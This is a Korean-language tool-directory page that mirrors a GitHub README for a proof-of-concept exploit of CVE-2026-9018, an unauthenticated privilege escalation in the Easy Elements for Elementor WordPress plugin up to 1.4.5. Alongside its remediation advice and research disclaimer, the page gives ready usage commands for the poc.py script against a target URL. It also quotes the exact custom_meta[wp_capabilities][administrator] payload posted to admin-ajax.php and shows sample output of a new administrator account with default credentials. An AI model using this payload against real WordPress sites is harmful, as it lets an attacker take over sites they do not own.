Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-9018 — Unauthenticated Privilege Escalation CVE-2026-9018: Easy Elements for Elementor | Kitploit
도구/GitHubGitHub/xxconi/cve-2026-9018
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubxxconi/cve-2026-9018

CVE-2026-9018

Unauthenticated Privilege Escalation CVE-2026-9018: Easy Elements for Elementor

저장소 보기
13개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-9018

CVE-2026-9018 — Easy Elements for Elementor ≤ 1.4.5 | 인증되지 않은 권한 상승

CVE CVSS CWE Auth Python

연구자: Atomic Edge 심각도: 높음 | CVSS: 8.8 | 인증 필요: 없음


개요

인증되지 않은 권한 상승 취약점이 Easy Elements for Elementor – Addons & Website Templates WordPress 플러그인(버전 ≤ 1.4.5)에 존재합니다. wp_ajax_nopriv_eel_register AJAX 핸들러를 통해 노출된 easyel_handle_register() 함수는 공격자가 제어하는 custom_meta POST 값을 키 확인 없이 update_user_meta()에 직접 전달합니다. 이를 통해 인증되지 않은 공격자가 wp_capabilities 메타 키를 덮어쓰고 관리자 수준 계정을 생성할 수 있습니다.


전제 조건

익스플로잇 전에 대상 사이트에서 다음 조건이 충족되어야 합니다:

  • ✅ WordPress 사용자 등록이 활성화되어 있어야 함 (설정 → 일반 → 누구나 가입 가능)
  • ✅ 플러그인의 로그인/등록 위젯이 포함된 페이지가 공개적으로 접근 가능해야 함
  • ✅ 위젯이 페이지 DOM에 easy_elements_nonce 값을 노출해야 함

요구 사항

root@kitploit:~
pip install requests

사용법

root@kitploit:~
# 기본 — 홈페이지에서 nonce 가져오기
python3 poc.py -u https://target.com

# 사용자 지정 자격 증명
python3 poc.py -u https://target.com -U hacker -e [email protected] -p P@ssw0rd!

# 위젯이 /login/ 페이지에 있는 경우
python3 poc.py -u https://target.com --nonce-page /login/

# SSL 인증 건너뛰기
python3 poc.py -u https://target.com --no-verify

# 익스플로잇 후 로그인 확인 건너뛰기
python3 poc.py -u https://target.com --skip-verify-login

인수

예시 출력

root@kitploit:~
[*] Fetching nonce from: https://target.com/login/
[+] Nonce found: a1b2c3d4e5

[*] Sending privilege escalation payload to: https://target.com/wp-admin/admin-ajax.php
[*] Username : atomic_admin
[*] Email    : [email protected]
[*] Role     : administrator (via wp_capabilities override)

[+] HTTP Status : 200
[✓] Privilege escalation payload accepted!
[✓] Admin login CONFIRMED!

    ┌─────────────────────────────────────────┐
    │  WP Admin  : https://target.com/wp-admin/
    │  Username  : atomic_admin
    │  Password  : Atomic@Edge2026!
    └─────────────────────────────────────────┘

기술적 세부사항

익스플로잇은 두 단계로 이루어집니다:

1단계 — Nonce 수집 플러그인의 로그인/등록 Elementor 위젯은 페이지 HTML에 숨겨진 easy_elements_nonce 필드를 렌더링합니다. 이 nonce는 인증되지 않은 모든 방문자에게 공개적으로 접근 가능하며 페이지 소스에서 정규식을 통해 추출됩니다.

2단계 — 악의적인 등록 action=eel_register와 함께 POST 요청이 /wp-admin/admin-ajax.php로 전송됩니다. custom_meta 배열은 다음을 포함하도록 조작됩니다:

root@kitploit:~
custom_meta[wp_capabilities][administrator] = 1

easyel_handle_register()가 화이트리스트 없이 모든 custom_meta 키를 직접 update_user_meta()에 전달하기 때문에, 등록 후 wp_capabilities 사용자 메타가 덮어쓰여져 새 사용자에게 전체 관리자 권한이 부여됩니다.


해결 방법

개발자는 easyel_handle_register()에 다음 수정 사항을 적용해야 합니다:

  1. 허용된 custom_meta 키에 대한 엄격한 화이트리스트 구현 (예: first_name, last_name, phone)
  2. 민감한 키를 명시적으로 차단: wp_capabilities, wp_user_level, session_tokens
  3. 필요하지 않은 경우 wp_insert_user() 이후 사용자가 제공한 메타를 전혀 처리하지 않음
  4. 입력 검증만으로는 불충분합니다 — 화이트리스트가 필수입니다

→ 즉시 Easy Elements for Elementor 1.4.6 이상으로 업데이트하세요.


면책 조항

이 저장소는 공인된 보안 연구 및 교육 목적으로만 사용됩니다. 시스템 소유자의 명시적인 서면 허가 없이 이 도구를 사용하지 마십시오. 무단 사용은 CFAA(미국), 형법 s.342.1(캐나다), EU NIS2 지침 및 기타 관련 법률을 위반할 수 있습니다. 저자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.

도구 다운로드
속성세부사항
플러그인Easy Elements for Elementor – Addons & Website Templates (easy-elements)
영향받는 버전≤ 1.4.5
수정된 버전1.4.6+
공격 벡터네트워크 / 인증되지 않음
CWECWE-269: 부적절한 권한 관리
AJAX 액션eel_register (nopriv)
플래그설명기본값
-u, --url대상 WordPress URL(필수)
-U, --username새 관리자 계정의 사용자 이름atomic_admin
-e, --email새 관리자 계정의 이메일[email protected]
-p, --password새 관리자 계정의 비밀번호Atomic@Edge2026!
-np, --nonce-page로그인/등록 위젯이 포함된 페이지 경로/
--no-verifySSL 인증서 확인 비활성화false
--skip-verify-login익스플로잇 후 WP 관리자 로그인 확인 건너뛰기false